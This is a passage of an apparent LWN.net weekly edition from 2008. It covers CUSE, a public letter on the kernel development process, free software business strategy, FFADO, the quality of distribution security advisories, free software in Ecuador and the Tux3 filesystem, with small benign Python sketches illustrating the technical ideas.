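The multi-step ioctl() with retries can be pictured with a toy exchange. The Python below is a sketch only and does not reflect the FUSE wire protocol: the Retry class, the function names, and the made-up ioctl (whose argument points to a header holding a buffer address and length) are assumptions for illustration. The server cannot read the caller's memory, so it asks the kernel side to fetch ranges and try again.

```python
import struct


class Retry:
    """Server reply: 'fetch these (address, length) ranges and ask again'."""

    def __init__(self, ranges):
        self.ranges = ranges


def server_ioctl(arg, fetched):
    """User-space handler for a made-up ioctl.

    `arg` points to a header of two 32-bit little-endian integers:
    the address and the length of a data buffer.
    """
    header_range = (arg, 8)
    if header_range not in fetched:
        return Retry([header_range])
    buf_addr, buf_len = struct.unpack("<II", fetched[header_range])
    buf_range = (buf_addr, buf_len)
    if buf_range not in fetched:
        return Retry([header_range, buf_range])
    return fetched[buf_range].decode()       # the final result


def kernel_ioctl(caller_memory, arg, handler, max_rounds=8):
    """Kernel side: keep copying in whatever the server asks for."""
    fetched = {}
    for rounds in range(1, max_rounds + 1):
        reply = handler(arg, fetched)
        if not isinstance(reply, Retry):
            return reply, rounds
        fetched = {(a, n): bytes(caller_memory[a:a + n])
                   for a, n in reply.ranges}
    raise RuntimeError("too many ioctl retries")


memory = bytearray(64)                       # the caller's address space
memory[32:37] = b"hello"
memory[0:8] = struct.pack("<II", 32, 5)      # header at address 0

print(kernel_ioctl(memory, 0, server_ioctl))
```

Each level of pointer indirection costs one more round trip in this model, which gives a feel for why the mechanism is described as ugly and why ordinary FUSE filesystems are held to the restricted form.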


Once the FUSE changes are in place, the actual implementation of CUSE is
relatively small, weighing in around 1000 lines plus some housekeeping to
rename and export FUSE symbols.  At its core, it collects up a FUSE-mounted
filesystem that connects to the user-space implemented device along with
the kernel-exported character device, binding the two together.  FUSE
handles the interaction with the user-space code, in the same way that it
does for a filesystem. 


CUSE creates a device for commands, /dev/cuse, which is opened by
a program that wants to implement a particular character device.  CUSE
queries the opener to determine which device it is implementing and then
creates the device node.  For most operations, CUSE just hands off to FUSE,
but for open() it, instead, opens a file from the FUSE mount,
storing the file handle for use by later operations. 

 In many ways, CUSE is a kind of impedance matching layer that creates
something that acts like a character device, but has no hardware directly
behind it.  This allows CUSE to ignore things like hardware interrupts;
those would need to be handled by something else, typically a downstream
driver—the soundcard driver in the OSS proxy case.  This is one of
the big differences between UIO and CUSE.  UIO is much more like a regular
kernel device driver that requires kernel code to handle interrupts.  CUSE
drivers, on the other hand, can be created without ever touching kernel
space.


The only objection so far seems to be Bunk's complaint about supporting
OSS when it has been deprecated for so long.  As Heo points out, though,
there are still many applications that only support OSS.  In addition, all
of the code that has been submitted is "way smaller than the
in-kernel ALSA OSS emulation which is somewhat painful to use these
days", Heo says.  Since there are
other potential users of CUSE, not just the OSS proxy, it would seem that,
absent any major objections, CUSE could make it into 2.6.29.  

		An open letter to Evgeniy Polyakov


[Editor's note: the following article may look like a message to a
specific kernel developer, but it is really about the development process
in general.  Over the years, your editor has seen too many worthy hackers
run into development process problems; the end result is often that we lose
that person's contributions.  We are not so rich that we can afford that
sort of loss.  The desire to prevent such problems was the motivation
behind your editor's recently-written development
process document - and this letter.]


Dear Evgeniy,

Your editor has chosen to write to you in a public manner because he hates
to see talented developers get frustrated with the kernel process and storm
off.  We do not have an excess of capable hackers, especially those who can
work at your level.  Losing one hurts.  Your editor hopes that this
eventuality can be avoided in this case - for you, and for others who may
be encountering the same sort of frustrations you are.  Getting code into
the kernel can be a pain, sometimes.  That said, some 1160
developers have managed it since the opening of the 2.6.28 merge window in
October.  It is possible to get code merged with sufficient care.

You first posted your distributed storage (DST) patch back in 2007; LWN took a look at it at that time.
Since then, this code has come a long way.  Beyond the basic task of
exporting (and accessing) storage volumes across the net, this code claims
"bullet-proof memory allocations," zero-copy transport, failover recovery
with full transaction support, support for IPv6 and beyond, and a number of
features including encrypted data channels.  And, it is said, this code is
fast.  In general, it looks like good stuff.

You have posted the DST code on the mailing lists a number of times - too many,
apparently, for your tastes.  Frustration with the process appears to have
led to the behavior described in your recent weblog post:


To understand the roots of this issue, I made a simple experiment with the
previous DST release. I added following lines into the patch to catch
reviewer's eyes: 


As you may expect, this does not compile and thus was never read by the
people who are subscribed to the appropriate mail lists. I got one private
mail about this fact for the whole week. The same DST code (without above
lines) was sent public first time more than month ago and was resent 3
times after that. 

That's why I do not care about DST inclusion anymore. I do not care about
its linux-kernel@ feedback.


So, because the fourth posting of identical code in one month received
little attention, 
DST now risks joining Kevents, network channels, network tree memory
management, asynchronous crypto, and more in that place where dusty,
out-of-tree 
stuff lives.  This would not be a good outcome.  So let us look at what can
be done to avoid that - for your sake, for DST users' sake, and for the
sake of other developers who may follow.

One way to get more reviews for your code is to pay attention to what those
reviewers are saying.  Andrew Morton spent some
time on DST back in October.  He had a number of concrete requests -
such as documenting the user-space ABI and the network protocol - which
have not been satisfied.  He also asked for better code documentation in
general:


	So please.  Go through all the code and make it tell a story.  Ask
	yourself "how would I explain all this to a kernel developer who is
	sitting next to me".  It's important, and it's an important skill.


The November 25, 2008 version
of DST still does not tell that story, and that makes it very hard for
other developers to understand.  Code review, as you know, is in critically
short supply in most free software projects.  Getting reviews for
difficult-to-understand code is hard, especially when it is a large body of
complex code which occupies a niche in which relatively few developers have
expertise.  So it's not surprising that your most recent comment involved
white space - anybody can make that kind of review without any need to
actually understand what's going on.

Not only does your patch not tell a story, but the individual pieces of it
do not even contain changelogs.  For a patch set marked "consider for
inclusion," that is a fatal error.  Playing along with the system on things
like that can seem like a waste of time, especially if you hold out no real
hope of the patch being merged, but it is a necessary sign of respect for
the people you are asking to consider the patch.  No maintainer will accept
a patch without a changelog.

While we're on the topic of documentation, your kernel configuration help
text reads, in its entirety:


	This driver allows to create a distributed storage block device.


You owe your users a little bit more than that.  Why might they want to use
DST?  Where can they get the associated tools?  This, too, is a fatal error
for any substantive kernel change.

And, while we're still somewhat on the subject of reviews: Andrew naturally
called out the generic-looking thread pool implementation buried deep
within DST; shouldn't it be pulled out and made more generic?  Your response can be paraphrased as "I can't be
bothered to get the API past the review process, which, in any case, is
biased toward those who are 'closer to the high end'."  But pulling out
this code and 
merging it separately might be the ideal starting point for getting the
larger patch set into the kernel.  A generic thread pool hiding within a
storage device driver, instead, will be an ongoing impediment to
inclusion.

Then there is the issue of motivation: why should the kernel developers
want to merge this patch?  Who are the users of it - do you have users now?
How does it compare to other distributed storage technologies already in
the kernel?  What's the performance like - can you post some benchmark
results?  As it stands, DST looks like a nice piece of technology, but its
benefits are still unclear.  Tell that story, and the level of interest may
well go up.

Finally, your editor would like to counsel patience.  Some patches just
take longer than others to find their way into the kernel.  That is
especially true of complex patches which touch on issues like memory
management and which add new user-space ABIs.  As a close-to-home example,
look at David Howells's FS-Cache 
code, recently reposted for
consideration.  The first LWN
article on this code was published more than four years ago.  David is
probably getting a little tired of maintaining this code out-of-tree, but
he sticks with it, responds to reviews, and appears to be getting closer to
inclusion.

Evgeniy, you appear to be a brilliant and productive hacker.  You charge
into places that scare off most kernel developers, and you always come back
out with something interesting.  We need developers like you.  But
we need developers like you who can work with the process - no matter how
frustrating it gets.  The kernel process is certainly far from perfect, but
it is built around a set of principles which have served us well for many
years.  You could easily rise up through that process to become one of the
"high end" developers who, you say, have an easier time getting code
merged.  Or you could take your marbles and storm home, making snide
comments about reviewers on the way.  But that would not be good
for anybody involved.

(See also: Evgeniy's response
to this article.)

		ELCE: Free software strategies for business


Shane Coughlan, legal coordinator for the Free Software Foundation Europe
(FSFE), spoke about the advantages of free software from a business
perspective at the recent Embedded
Linux Conference Europe.  His talk was not necessarily directed at his
audience—as most were already free software users—but, instead,
at the bosses of his audience, the
management of companies using or considering using free software.  His
approach was to use the language that management understands while making a
strong case for the value that free software can bring.


Coughlan noted the obligatory analyst projections, including 4% of
European GDP coming from free software by 2010 as well as 80% of
commercial software projected to contain free software by 2011.  These are
eye-opening numbers, so Coughlan went on to explain why those numbers are
that high.
Businesses are created to deliver value to their investors; in order to
succeed, they will need to "deliver value now and deliver more value
later and that's how you are going 
to run a successful business".  A short-term outlook is not going to
deliver real success.  Paraphrasing Bill Clinton, he said "it's for
the long term, stupid".


Proprietary software allows businesses to "do some stuff", but
free software allows them to "do more stuff".  As
Coughlan describes it, the correct approach is for a business to "do
more and keep doing it"; using free software makes that easier.
"From a business perspective, free software rocks."


The key to free software is not in the cost nor is it in the availability of
source code, he said, as those do not embody the freedoms that are
important.  The ability to "use, study, share, and improve",
known as the four freedoms, is what gives free software its edge.  They
allow for more 
flexibility and growth than other kinds of software, he said.


If free software has so many upsides, what's the
catch?  "Free software is powered by licenses", so businesses
need to understand those licenses and, just as importantly, the reasoning
behind those licenses.  This is no different than any other license, but a
common problem is that people don't read the licenses or follow the terms.
If they do, there is no problem, though. So, there is a catch, but
"the catch isn't too big". 


A business must apply some management science to determine its strategy:
whether to use an existing solution or work on building a new one.  If it
decides to build something new, does it foster some kind of community model
or not?  These are the kinds of questions that need to be answered as part
of determining a free software strategy.


Communication with people in the community is important as is choosing
licenses that are popular and compatible.  There are ways to reduce any
risk associated with free software by using existing best practices.  That
means pro-actively resolving issues, not just putting free software into a
product, then "pray, and be upset when someone tells us we were
naughty". 


One of the resources available to help management is the FSFE's Freedom Task Force (FTF) which is
set up to assist everyone in understanding free software licensing.  The
FTF does training and consulting for businesses to help with
licensing or other issues.  If one is having trouble getting management
on board, refer them to the FTF: "we won't actually lock them up and
brainwash them", Coughlan said.


While companies are resistant to releasing their code, "if you're
doing your marketing right and you're not relying on temporary monopolies,
you can probably release quite a lot" of code without any business
harm.  It has been estimated that the body of free software is "worth" $12
billion, so a company can reimplement it, "at an estimated cost of
$12 billion, or you can share your $2-3 million [investment] and use the
code".   It's a matter of recognizing the immense benefits that come
with free software.


Coughlan also described a legal network that the FTF is fostering in
Europe, where lawyers and legal experts can discuss issues of importance to
free software, especially across jurisdictional boundaries.  That network
can help provide businesses with legal information to help reduce risks.
There is, as
yet, no US equivalent, though some US lawyers are participating in the
European network. "Still, I'm confident that eventually the US will
catch up with us", he said.


He wrapped up with some thoughts on the GPLv3, noting that "adoption
in the first year has been very, very promising".  In fact, it has
been adopted faster than he expected.  He did note that there are some
problems with license incompatibilities, but that those are probably
unavoidable.  The ideal situation would be for every license to be able to
work with every other, but it doesn't work that way, which is a bit of an
inconvenience, but not really a problem at this point.


Coughlan did not really say very much that LWN readers won't have
heard before, but he did put it together in a way that should resonate with
businesspeople.  It was also interesting to get a look at what FSFE, and
particularly FTF, are up to.  There is a lot of important free software
work, completely separate from development, going on in Europe.
Because I am US-based—hopefully not too US-biased—that
sometimes gets overlooked, so it was very nice to have a chance to hear about
that work.


		FFADO approaches the 2.0 release


The FFADO
(Free Firewire Audio Drivers) project provides support for
FireWire
(IEEE 1394) audio devices under Linux:


The FFADO project aims to provide a generic, open-source solution for the support of FireWire based audio devices for the Linux platform. It is the successor of the
FreeBoB
project.
FFADO is a volunteer-based community effort, trying to provide Linux with at least the same level of functionality that is present on the other operating systems. It is a work in progress, we are close, but we are not quite there yet.


The
About document explains
further:
"We try to support any FireWire device available out there. The FFADO codebase is a framework that has been built with this in mind. This however doesn't mean that all FireWire devices work with FFADO. In order to support a device, we need cooperation from manufacturers, or somebody that want[s] to reverse engineer the protocol.
Luckily we have support from the manufacturers of the three major platforms vendors build their devices around (BridgeCo, TC Applied Technologies and ECHO). The exact devices supported (or not supported) can be found on our
device list."


Release candidate 1 of FFADO 2.0 was
announced
this week:
"This release candidate is intended to collect feedback about
the library under wide-spread usage. The code should be free of major
bugs. We are looking for packagers that are interested in creating
packages for their favorite distribution. Please contact us if you
can help us out with this."
Users of FreeBoB are encouraged to try this release out.


The full
change log
shows the latest changes to the software; most of the work involves
bug fixing.  The feature list is also found there.
Capabilities include:

Support for an unlimited number of 24-bit audio I/O channels.
Support for all device sample rates.
Support for an unlimited number of MIDI I/O channels.
Support for the S/PDIF audio interface format.
Support for the ADAT SMUX I/O format.
Support for external synchronization.
Support for internal mixers and other device controls.
Support for device aggregation on an externally synced bus.


The project
documentation
has more information.
The installation notes
from the FAQ pages explain how the various components of the software
work together.


If your favorite application requires FireWire support, or you need
to migrate away from the unsupported FreeBoB library, now would be a
good time to give FFADO a try.


		Distribution advisories


Here at LWN, we get a chance to see a fair number of security advisories in
the course of a week—sometimes even in just a single day—so we tend to
notice the quality, or lack thereof, of these important announcements.
There are a few important pieces of information that need to be a
part of any security update announcement, but sadly sometimes they aren't
included.  Overall, the quality of advisories seems to be declining, which
is something that we would like to see change.  While it clearly would make
collecting security advisories easier for us, that is not the primary
motivation for this look at security reporting—users are not being
well-served by the current state of affairs.


Distributions need to remember that the audience for their security
announcements is their users.  Those users require some basic information
to make an informed choice about whether they need to apply the update as
well as how urgently.  In order to make those decisions, the following
should be present in advisories:

the package affected
the problem that is being fixed
the impact of the vulnerability
some kind of unique identifier for the alert
links to relevant additional information (CVE,
bugzilla, ...)
where and how to update the package
consistent formatting of advisories is a definite plus

Users are not as familiar with either the package or the distribution as
the person writing the alert is, so it should be written with that in
mind.  The most important thing is to concisely communicate the severity
and urgency of the problem in a way that the reader can
understand—and figure out what to do about it.
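The checklist above is simple enough to check mechanically. What follows is only a sketch: the field names and the sample advisory are invented for illustration and do not correspond to any distribution's actual advisory format.

```python
# Hypothetical field names, one per item in the checklist above.
REQUIRED_FIELDS = (
    "package",              # the package affected
    "problem",              # the problem that is being fixed
    "impact",               # the impact of the vulnerability
    "identifier",           # a unique identifier for the alert
    "references",           # CVE, bugzilla, ...
    "update_instructions",  # where and how to update the package
)


def missing_fields(advisory):
    """Return the checklist items that are absent or empty in an advisory."""
    return [field for field in REQUIRED_FIELDS if not advisory.get(field)]


# An invented advisory that names a package and an identifier but never
# says what the problem is or how serious it might be.
example = {
    "package": "examplepkg",
    "identifier": "EXAMPLE-2008-0001",
    "references": ["CVE-XXXX-XXXX"],
    "update_instructions": "run the distribution's usual update tool",
}
```

Running `missing_fields(example)` reports the "problem" and "impact" fields, which is exactly the kind of gap discussed below.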


The biggest problem seen with alerts of late is a lack of information about
the problem they are fixing.  As an example, consider the recent Fedora advisory on kvm.  It
refers to a recent CVE number (CVE-2008-4539)
which is "reserved", but no details are present, and says that it fixes a
"cirrus vulnerability".  It also references a bugzilla
entry that apparently addresses a separate CVE from 2007 (CVE-2007-1320).
If you follow that link in
the bugzilla, you finally end up somewhere with actual information, though
the connection between the two problems is not particularly obvious.


Another example of this is CentOS advisories, which suffer from a number of
problems, but the most vexing for folks trying to determine whether they
need to update is this lack of bug information.  It is not all that hard to
get the information as a typical
alert has a link to the appropriate Red Hat advisory, but why make
users take that step?  A concise summary of the bug(s), as well as a
reference to the—generally very complete—Red Hat errata, would
be quite useful.  There is certainly nothing wrong with linking to sources
of additional information, but the basics of the problem and its impact
should be available in the alert. 


Unique identifiers for advisories are useful for a number of reasons:
keeping track of which have been addressed, having a unique search string to
use, or referring to them in conversations, bug reports, etc.  When the
identifier is not unique, it muddies the waters a bit, making it more
difficult than it needs to be.  Sometimes mistakes are made (like the spate
of recent Fedora alerts with the same FEDORA-2008-10000 identifier), but
there also appear to be distribution policies that call for using identifiers multiple times.
CentOS uses the same identifier on multiple advisories, one per
architecture, but also shared between CentOS releases.  So the same
identifier will be applied to an s390 update for CentOS 4 as is applied to
x86_64 for CentOS 5.


Another identifier reuse problem comes from Fedora.  When mozilla (or more
recently xulrunner) library vulnerabilities occur, Fedora pro-actively
rebuilds and updates all of the packages that depend on those libraries.
This is very much to its credit as the API is not (yet) stable, but all of
the resulting alerts refer to the same identifier.  For those who try to
track vulnerabilities along with alerts, that results in messy listings that don't
provide much in the way of helpful information.  Other library bugs result
in much saner listings where
one could relatively easily track down—and keep straight—the
advisories for various packages.


There are other problems as well. Alerts that combine unrelated
fixes do "avoid flooding mailing lists", but they are a bit painful to
tease apart for users that are tracking specific packages.  Too much
history, in the form of changelogs (example) can also be confusing.
If there is only a link to provide vulnerability information, as is the
CentOS way, it 
should probably go directly to a page about the flaw, not to some page that
lists all recent upstream flaws (example).  And on and on.


Certain distributions have been singled out here, but that is not really
the point.  These are just recent examples of problems that are regularly
seen in distribution security alerts.  It should be noted that the
commercial distributions (SUSE, Ubuntu, Red Hat, Mandriva) seem to do a
much better job overall, which is not surprising, but sometimes they fail
as well.  The key thing to remember is that security announcements are
meant to be read by users and acted upon.  If information is lacking, the
communication will fail. 


This is not the first time we have looked at the problem; way back in 2000,
security page editor Liz Coolbaugh took a look at security
advisories, and had some of the same complaints seen here.  Her
conclusion is still valid: it is not that distributions are not trying or
that they don't care, but at times the contents of their advisories slip
below the radar.  After her article, things got better with security
alerts; hopefully this gentle prodding will have a similar effect.


		A look at free software in Ecuador


I recently spoke at the Congress on Free
Software and Democratization of Knowledge hosted in Quito by the
Universidad Politecnica Salesiana of Ecuador. My general report about the
conference and Free as in Freedom knowledge in that country is at the P2P
Foundation blog: the trip, however, was also an excellent occasion to
check out the most interesting Free Software projects currently taking
place in Ecuador. It turns out that there is a lot of activity at the
Government level to promote Free Software, and interesting news from some
cool projects developed locally. 

FOSS in the Government

A recent presidential decree mandates that most national Public
Administrations migrate entirely to Free Software. Ing. Mario Albuja, head
of the Subsecretariat for Information Technology of the Presidency of
Ecuador, explained during the congress the reasons and the general
guidelines of this initiative. Later on, I was able to get more details in
a couple of meetings with the members of his staff. Among the most
important things going on right now are the studies and tests for a
government digital signature application which runs on GNU/Linux and a
unified document management system for 45 central Public
Administrations. There is also a field trial of the GPL hospital management
software Care2X in the works.


The initial implementation of the digital signature project, which uses
Free Software whenever possible, is based on keys and digital certificates
stored on SafeNet iKey 2032 USB
tokens from Entrust. The first official field test will take place in
the next weeks, when President Correa himself will use one such key to sign
a decree. The Certificate Authority infrastructure which will issue keys
and certificates is the same implemented
by Banco Central del Ecuador in November 2007.


The software application itself runs inside any browser. A PostgreSQL
backend stores all the documents, together with administrative metadata, on
a CentOS-based server. The decrees waiting for electronic signature are
presented to the user via a simple Apache/PHP front-end. The actual digital
signature happens through a Java applet which reads the encrypted key from
the USB token thanks to libraries provided by Entrust.


Another big step in the process of freeing Ecuador institutions from
proprietary software will be the formal ratification of OpenDocument 1.0 by
the Ecuadorian Institute of Standards
(INEN). Large-scale usage of this format for public documents
should take off right after that, around mid-2009.


All the public officials I talked with really believe in the potential of
Free Software for a developing country like Ecuador. That makes a comment
I got from them all the more relevant and worthy of careful consideration:
there is, they say, no coordination or common vision among the developers
of the several FOSS applications they need to deploy. This was no surprise, of
course: people at the Subsecretariat understand how FOSS development
works. Nevertheless, the fact that there is no unified, local, reliable
source for support, with predictable, if not guaranteed, response times, is
creating more problems for them than they expected when they began. There may
be quite a business opportunity here for local FOSS entrepreneurs.


Talking with hackers

Rafael Bonifaz told me what's
new in the Elastix world. In case you have never heard of it, Elastix is a specialized GNU/Linux
distribution born and (mostly) developed in Ecuador. Its goal is
to solve all the communication problems of organizations of any
size. Elastix integrates in one easy to administer package all you need to
have PBX, VoIP, email, instant messaging, fax and fax/email gateway through
Asterisk, Hylafax, Postfix and Openfire
for Jabber. You can manage all the PBX functions with a customized
version of freepbx. Other tools
developed by the Elastix team provide hardware detection, centralized
automatic configuration of phones and billing support with a2billing.


Elastix is doing great in Ecuador: RTS and Aerolineas
Galapagos (Aerogal), which are respectively one of the most important
TV channels and one of the main domestic airlines in Ecuador, are using
it. In particular, Aerogal is running its call center on Elastix, which is
also being deployed in the Ministry of Public Health.


Rafael, who is the current coordinator of the Elastix Community, is also
proud of the fact that Elastix is the only GNU/Linux distribution for
communications which has two manuals, totaling about five hundred
pages, freely downloadable from the Internet: Elastix
Without Tears [PDF] by Ben Sharif and Unified
communications with Elastix [PDF] by Edgar Landivar. The second manual is
still a beta version, currently available only in Spanish. There already
is, however, a new mailing list
devoted to coordinating all the translation efforts for this second
book.


Also thanks to Rafael, after learning about Elastix I met a local group of
Java developers who have very recently begun developing a new, interesting
content management system called Melenti.
Adrian Cadena, member of the Melenti team, explained to me that he and his
partners needed a GPL-licensed, friendly, easy-to-use and fast CMS that
could scale well from personal web pages to corporate portals. Another must
on their requirement list was ease of integration with enterprise software
(Java or not) for ERP, CRM and SAP services. That's why, three months ago,
after some unsatisfactory experiences with the popular Joomla CMS they started writing Melenti.


One of the main features of Melenti should be performance under high
loads. Adrian said they are aiming for something able to handle hundreds of
thousands of clicks per second, something which Joomla "simply could not
handle, when we tried it". Melenti administrators, by contrast, would be
able to configure load balancing without problems, thanks to an interface
based on JNDI
and other tools.


Melenti should run on any JEE infrastructure, from Websphere to JBoss, BEA,
Oracle AS, Tomcat, Jetty and more. According to Adrian, Melenti will also
be much simpler to set up and extend than most other GPL software for
Content Management.

Installation should be as simple as dropping a .war file into your flavor
of JEE container and following the steps of the graphical wizard which will
pop up. Writing Melenti "gadgets", that is plugins, should also be easier
than with Joomla, Drupal, Php-nuke and similar products. This is because, says
Adrian, "unlike those products, Java has worldwide standards like
Spring, JPA, JSF, GWT and so on: new developers can just take a look at the
core Melenti API and start writing their own gadgets in no time."


The first releases of Melenti will support basic CMS functions like
management of web pages, images and other files. There will also be
interfaces for banner rotation, creation of user polls and a Web Services
Creator. The latter is a simple wizard to create Web Services from existing
Melenti gadgets. The first alpha version of Melenti
has just been uploaded to Sourceforge. You're obviously welcome to have
a look at the code and to participate in the development of Melenti.


Let's now go back to the reason I went to Quito, that is, Free Software
and Democratization of Knowledge. Quiliro Ordonez, with one friend
and other occasional volunteers, is now implementing in the field a project
first announced
in 2007: placing Free Software in a school of the community of
Quilapungo, south of Quito, which serves about 200 students.
Thus far, Quiliro has installed 2 servers and 4 thin clients running
gNewSense. He chose this
distribution because it is "100% free software, without non-free
repositories or blobs in the kernel which promote functionality before
anything else, as this would weaken our position for freedom." He's
also very happy with TCOS, which
made setting up the thin clients a breeze.  The school staff will use Projecto Alba, a modular
administration and planning software for schools first developed in
Argentina. While gNewSense worked fine out of the box, Quiliro and his
partners had to localize Alba to adapt it to the terminology and procedures
adopted in Ecuadorian schools.


Eventually, the school in Quilapungo will have about 40 GNU/Linux
workstations, but Quiliro doesn't plan to stop there. If all goes well,
Quilapungo will be presented as a pilot project in a proposal for Free
Software deployment in all public schools in Ecuador. Let's wish Quiliro
good luck!


		Tux3: the other next-generation filesystem


There is a great deal of activity around Linux filesystems currently.  Of
the many ongoing efforts, two receive the most attention: ext4, the
extension of ext3 expected to keep that filesystem design going for a few
more years, and btrfs, which is seen by many as the long-term filesystem of
the future.  But there is another project out there which is moving quickly
and is worth a look: Daniel Phillips's Tux3 filesystem.

Daniel is not a newcomer to filesystem development.  His Tux2 filesystem was
announced in 2000; it attracted a fair amount of interest until it turned out that
Network Appliance, Inc. held patents on a number of techniques used in
Tux2.  There was some talk of filing for defensive patents, and Jeff Merkey
popped
up for long enough to claim to have hired a patent attorney to help
with the situation.  What really happened is that Tux2 simply faded from
view.
Tux3 is built on some of the same ideas as Tux2, but many of those ideas
have evolved over the eight intervening years.  The new filesystem, one
hopes, has changed enough to avoid the attention of NetApp, which has shown
a willingness to use software patents to defend its filesystem turf.


Like any self-respecting contemporary filesystem, Tux3 is based on
B-trees.  The inode table is such a tree; each file stored within is also a
B-tree of blocks.  Blocks are mapped using extents, of course - another
obligatory feature for new filesystems.  Most of the expected features are
present.  In many ways, Tux3 looks like yet another POSIX-style filesystem,
but there are some interesting differences.


Tux3 implements transactions through a forward-logging mechanism.  A set of
changes to the filesystem will be batched together into a "phase," which is
then written to the journal.  Once the phase is committed to the journal,
the transaction is considered to be safely completed.  At some future time,
the filesystem code will "roll up" the journal changes and write them back
to the static version of the filesystem.

The logging implementation is interesting.  Tux3 uses a variant of the
copy-on-write mechanism employed by Btrfs; it will not allow any filesystem
block to be overwritten in place.  So writing to a block within a file will
cause a new block to be allocated, with the new data written there.  That,
in turn, will require that the filesystem data structure which maps
file-logical blocks to physical blocks (the extent) be changed
to reflect the new block location.  Tux3
handles this by writing the new blocks directly to their final location,
then putting a "promise" 
to update the metadata block into the log.  At roll-up time, that promise
will be fulfilled through the allocation of a new block and, if necessary,
the logging of a promise to change the next-higher block in the tree.  In
this way, changes to files propagate up through the filesystem one step at
a time, without the need to make a recursive, all-at-once change.
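The step-by-step propagation described above can be modeled in a few lines of Python. This is a toy sketch, not Tux3 code: the class, its two-level tree (one root, one leaf), and the in-memory `moved` table are all assumptions made to keep the example small. It shows only the core idea: data goes straight to a fresh block, a promise goes into the log, and each roll-up step copies one metadata block and pushes a new promise one level up.

```python
class ToyVolume:
    """Toy model: blocks are never overwritten; metadata changes are logged."""

    def __init__(self):
        self.blocks = {}   # block number -> contents; entries are never replaced
        self.log = []      # pending promises: (metadata block, slot, new child)
        self.moved = {}    # old metadata block -> its newer copy (in memory only)
        leaf = self.alloc({})               # maps file block -> data block
        self.root = self.alloc({0: leaf})   # maps slot -> leaf
        self.parent_of = {leaf: (self.root, 0)}

    def alloc(self, contents):
        number = len(self.blocks)
        self.blocks[number] = contents
        return number

    def current(self, number):
        """Follow the chain of copies to the newest version of a block."""
        while number in self.moved:
            number = self.moved[number]
        return number

    def lookup(self, block, slot):
        """Read a pointer, treating pending promises as part of the metadata."""
        block = self.current(block)
        for target, promised_slot, child in reversed(self.log):
            if self.current(target) == block and promised_slot == slot:
                return child
        return self.blocks[block][slot]

    def write(self, file_block, data):
        """Put data in a fresh block and log a promise to update the leaf."""
        new_block = self.alloc(data)
        leaf = self.lookup(self.root, 0)
        self.log.append((leaf, file_block, new_block))
        return new_block

    def read(self, file_block):
        leaf = self.lookup(self.root, 0)
        return self.blocks[self.lookup(leaf, file_block)]

    def roll_up_one(self):
        """Fulfil the oldest promise by copying one metadata block."""
        target, slot, child = self.log.pop(0)
        old = self.current(target)
        updated = dict(self.blocks[old])
        updated[slot] = child
        new = self.alloc(updated)
        self.moved[old] = new
        parent = self.parent_of.pop(old, None)
        if parent is None:
            self.root = new                    # the root itself was copied
        else:
            self.parent_of[new] = parent
            self.log.append(parent + (new,))   # promise for the next level up
```

A single `write()` leaves one promise in the log; the first `roll_up_one()` copies the leaf and logs a promise against the root, and the second copies the root and empties the log. Reads give the same answer at every stage because `lookup()` consults the log first.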

The end result is that the effects of a specific change can remain in the
log for some time.  In Tux3, the log can be thought of as an integral part
of the filesystem's metadata.  This is true to the point that Tux3 doesn't
even bother to roll up the log when the filesystem is unmounted; it just
initializes its state from the log when the next mount happens.  Among
other things, Daniel says, this approach ensures that the journal recovery
code will be well-tested and robust - it will be exercised at every
filesystem mount.


In most filesystems, on-disk inodes are fixed-size objects.  In Tux3,
instead, their size will be variable.  Inodes are essentially containers
for attributes; in Tux3, normal filesystem data and extended attributes are
treated in almost the same way.  So an inode with more attributes will be
larger.  Extended attributes are compressed through the use of an "atom
table" which remaps attribute names onto small integers.  Filesystems with
extended attributes tend to have large numbers of files using attributes
with a small number of names, so the space savings across an entire
filesystem could be significant.
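The atom table idea amounts to interning strings. A minimal sketch follows; the class and function names are invented here, and nothing about Tux3's on-disk encoding should be inferred from it.

```python
class AtomTable:
    """Map attribute names to small integers ("atoms") and back."""

    def __init__(self):
        self.atom_of = {}   # name -> atom
        self.name_of = []   # atom -> name

    def intern(self, name):
        """Return the atom for a name, assigning the next integer if new."""
        atom = self.atom_of.get(name)
        if atom is None:
            atom = len(self.name_of)
            self.atom_of[name] = atom
            self.name_of.append(name)
        return atom

    def name(self, atom):
        return self.name_of[atom]


def pack_xattrs(table, xattrs):
    """Replace each attribute name in an inode's xattrs with its atom."""
    return {table.intern(name): value for name, value in xattrs.items()}


def unpack_xattrs(table, packed):
    return {table.name(atom): value for atom, value in packed.items()}
```

However many inodes carry, say, a `security.selinux` attribute, the name itself is stored once in the table; each inode holds only the small integer.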

Also counted among a file's attributes are the blocks where the data is
stored.  The Tux3 design envisions a number of different ways in which file
blocks can be tracked.  A B-tree of extents is a common solution to this
problem, but its benefits are generally seen with larger files.  For
smaller files - still the majority of files on a typical Linux system - data can be
stored either directly in the inode or at the other end of a simple block
pointer.  Those representations are more compact for small files, and they
provide quicker data access as well.  For the moment, though, only extents
are implemented.


Another interesting - but unimplemented - idea for Tux3 is the concept of
versioned pointers.  The
btrfs filesystem implements snapshots by retaining a copy of the entire
filesystem tree; one of these copies exists for every snapshot.  The
copy-on-write mechanism in btrfs ensures that those snapshots share data
which has not been changed, so it is not as bad as it sounds.  Tux3 plans
to take a different approach to the problem; it will keep a single copy of
the filesystem tree, but keep track of different versions of blocks (or
extents, really) within that tree.  So the versioning information is stored
in the leaves of the tree, rather than at the top.
But the versioned extents idea has been deferred for now, in favor of getting
a working filesystem together.
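To make the contrast concrete, here is a sketch of a pointer that carries its own version information. It assumes a simple linear sequence of version numbers, where a snapshot sees the newest extent recorded at or before its own version; that is a simplification chosen for illustration, not a description of the design Daniel has posted.

```python
import bisect


class VersionedPointer:
    """One leaf entry holding an extent for each version that changed it."""

    def __init__(self):
        self.versions = []   # sorted version numbers
        self.extents = []    # extents[i] was recorded at versions[i]

    def set(self, version, extent):
        """Record the extent as of the given version."""
        i = bisect.bisect_left(self.versions, version)
        if i < len(self.versions) and self.versions[i] == version:
            self.extents[i] = extent
        else:
            self.versions.insert(i, version)
            self.extents.insert(i, extent)

    def get(self, version):
        """Return the extent visible to a snapshot taken at this version."""
        i = bisect.bisect_right(self.versions, version)
        if i == 0:
            return None      # nothing had been written yet at that version
        return self.extents[i - 1]
```

A block which never changes has a single entry no matter how many snapshots exist, and the tree above it is never duplicated.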


Also removed from the initial feature list is support for subvolumes.  This
feature initially seemed like an easy thing to do, but interaction with
fsync() proved hard.  So Daniel finally concluded that volume management was best left
to volume managers and dropped the subvolume feature from Tux3.


One feature which has never been on the list is checksumming of data.
Daniel once commented:


	Having been checksumming filesystem data during continuous
	replication for two years now on multiple machines, and having
	caught exactly zero blocks of bad data passed as good in that time,
